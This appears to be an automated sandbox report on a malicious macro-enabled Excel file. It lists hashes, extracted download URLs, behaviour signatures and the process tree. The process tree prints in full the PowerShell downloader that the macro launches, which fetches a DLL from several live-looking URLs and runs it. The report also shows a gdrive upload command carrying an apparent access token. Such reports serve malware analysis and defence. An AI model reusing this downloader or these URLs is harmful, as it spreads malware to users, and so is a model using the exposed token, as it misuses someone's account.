Analysis
- max time kernel: 470s
- max time network: 614s
- platform: windows10_x64
- resource: win10-en-20211104
- submitted: 25-11-2021 16:48
Static task: static1
Behavioral task: behavioral1
Sample: pload/865663204559_17_Nov_2021.xlsm
Resource: win10-en-20211104
General
- Target: pload/865663204559_17_Nov_2021.xlsm
- Size: 44KB
- MD5: 477fd718bb764ffe3c5afde16c6c8dd2
- SHA1: eb932e19d95f88d64270d40cdc0b92c6d1cf63be
- SHA256: ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3
- SHA512: f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267
Malware Config
Extracted
https://evgeniys.ru/sap-logs/D6/
http://crownadvertising.ca/wp-includes/OxiAACCoic/
https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/
http://immoinvest.com.br/blog_old/wp-admin/luoT/
https://yoho.love/wp-content/e4laFBDXIvYT6O/
https://www.168801.xyz/wp-content/6J3CV4meLxvZP/
https://www.pasionportufuturo.pe/wp-content/XUBS/
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process; pid: 4688 (cmd.exe); pid_target: 4196 (EXCEL.EXE)
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (EXCEL.EXE)
    Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (EXCEL.EXE)
    Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (EXCEL.EXE)
- Enumerates processes with tasklist (1 TTP, 3 IoCs)
  Processes:
    pid 2388 tasklist.exe
    pid 508 tasklist.exe
    pid 3608 tasklist.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS (EXCEL.EXE)
    Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (EXCEL.EXE)
    Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (EXCEL.EXE)
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid 4196 EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
    pid 3032 procdump64.exe (recorded 4 times)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes:
    Token: SeDebugPrivilege, pid 2388 tasklist.exe
    Token: SeDebugPrivilege, pid 3032 procdump64.exe
    Token: SeDebugPrivilege, pid 508 tasklist.exe
    Token: SeDebugPrivilege, pid 3608 tasklist.exe
- Suspicious use of SetWindowsHookEx (12 IoCs)
  Processes:
    pid 4196 EXCEL.EXE (recorded 12 times)
- Suspicious use of WriteProcessMemory (22 IoCs)
  Processes (each pair is recorded twice in the report):
    PID 4196 (EXCEL.EXE) wrote to memory of 4688 (cmd.exe)
    PID 4688 (cmd.exe) wrote to memory of 5116 (powershell.exe)
    PID 2840 (cmd.exe) wrote to memory of 2388 (tasklist.exe)
    PID 2840 (cmd.exe) wrote to memory of 3032 (procdump64.exe)
    PID 2840 (cmd.exe) wrote to memory of 3012 (cmd.exe)
    PID 3012 (cmd.exe) wrote to memory of 3496 (cscript.exe)
    PID 2840 (cmd.exe) wrote to memory of 3352 (gdrive.exe)
    PID 2840 (cmd.exe) wrote to memory of 508 (tasklist.exe)
    PID 2840 (cmd.exe) wrote to memory of 1720 (find.exe)
    PID 2840 (cmd.exe) wrote to memory of 3608 (tasklist.exe)
    PID 2840 (cmd.exe) wrote to memory of 3172 (findstr.exe)
Processes (indentation shows the process tree; depth 1 = top level)
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\pload\865663204559_17_Nov_2021.xlsm"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
- C:\Windows\System32\rundll32.exe (depth 1)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: "C:\Windows\System32\cmd.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\tasklist.exe (depth 2)
    Command line: tasklist
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\pload\procdump64.exe (depth 2)
    Command line: procdump64.exe -ma 5116
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (depth 2)
    Command line: C:\Windows\system32\cmd.exe /c cscript.exe dec.vbs
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cscript.exe (depth 3)
      Command line: cscript.exe dec.vbs
  - C:\Users\Admin\AppData\Local\Temp\pload\gdrive.exe (depth 2)
    Command line: gdrive.exe upload --access-token ya29.a0ARrdaM_WSt9QajZZv3IKyl2VX_GATva1IaeDQ6qFo-YL5glldk78310Im4EJo6o9gV608PCv8sDwe4S1DD645RGDCzdvrQa_7T88OxlVlUDmzvfSZfOUlPEjSK5MH7--hQSmX7NTPxUkRzq3X0fBXJAoooDX -p 1NUiA818Vwo-I0Ls9NNaWb8pM5y8SLuXG powershell.exe_211125_165032.dmp
  - C:\Windows\system32\tasklist.exe (depth 2)
    Command line: tasklist
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\find.exe (depth 2)
    Command line: find power
  - C:\Windows\system32\tasklist.exe (depth 2)
    Command line: tasklist
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\findstr.exe (depth 2)
    Command line: findstr power
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\pload\powershell.exe_211125_165032.dmp
  MD5: 3395357e8a5bc60cc0bd413eaa0cd39a
  SHA1: 4de70b8b48f0a9d2685671fd48decf3a2897f644
  SHA256: 3e5c7112ccdf2be377b4af5b42515e42f703089482008de2de40276bbcc90c0e
  SHA512: be1eeb8314b7d1e44699742cb152da51a9ddc5ca821f2b24062c0ce3062a6b4a04c4b72e7553b80f4ee349ae6c200edf22db6f67217fbaaffbc3f6697202df66
- memory/508-312-0x0000000000000000-mapping.dmp
- memory/1720-313-0x0000000000000000-mapping.dmp
- memory/2388-306-0x0000000000000000-mapping.dmp
- memory/3012-308-0x0000000000000000-mapping.dmp
- memory/3032-307-0x0000000000000000-mapping.dmp
- memory/3172-315-0x0000000000000000-mapping.dmp
- memory/3352-310-0x0000000000000000-mapping.dmp
- memory/3496-309-0x0000000000000000-mapping.dmp
- memory/3608-314-0x0000000000000000-mapping.dmp
- memory/4196-120-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmp (Filesize: 64KB)
- memory/4196-118-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmp (Filesize: 64KB)
- memory/4196-130-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmp (Filesize: 64KB)
- memory/4196-121-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmp (Filesize: 64KB)
- memory/4196-123-0x000001C5CCDF0000-0x000001C5CCDF2000-memory.dmp (Filesize: 8KB)
- memory/4196-119-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmp (Filesize: 64KB)
- memory/4196-124-0x000001C5CCDF0000-0x000001C5CCDF2000-memory.dmp (Filesize: 8KB)
- memory/4196-122-0x000001C5CCDF0000-0x000001C5CCDF2000-memory.dmp (Filesize: 8KB)
- memory/4688-290-0x0000000000000000-mapping.dmp
- memory/5116-295-0x0000000000000000-mapping.dmp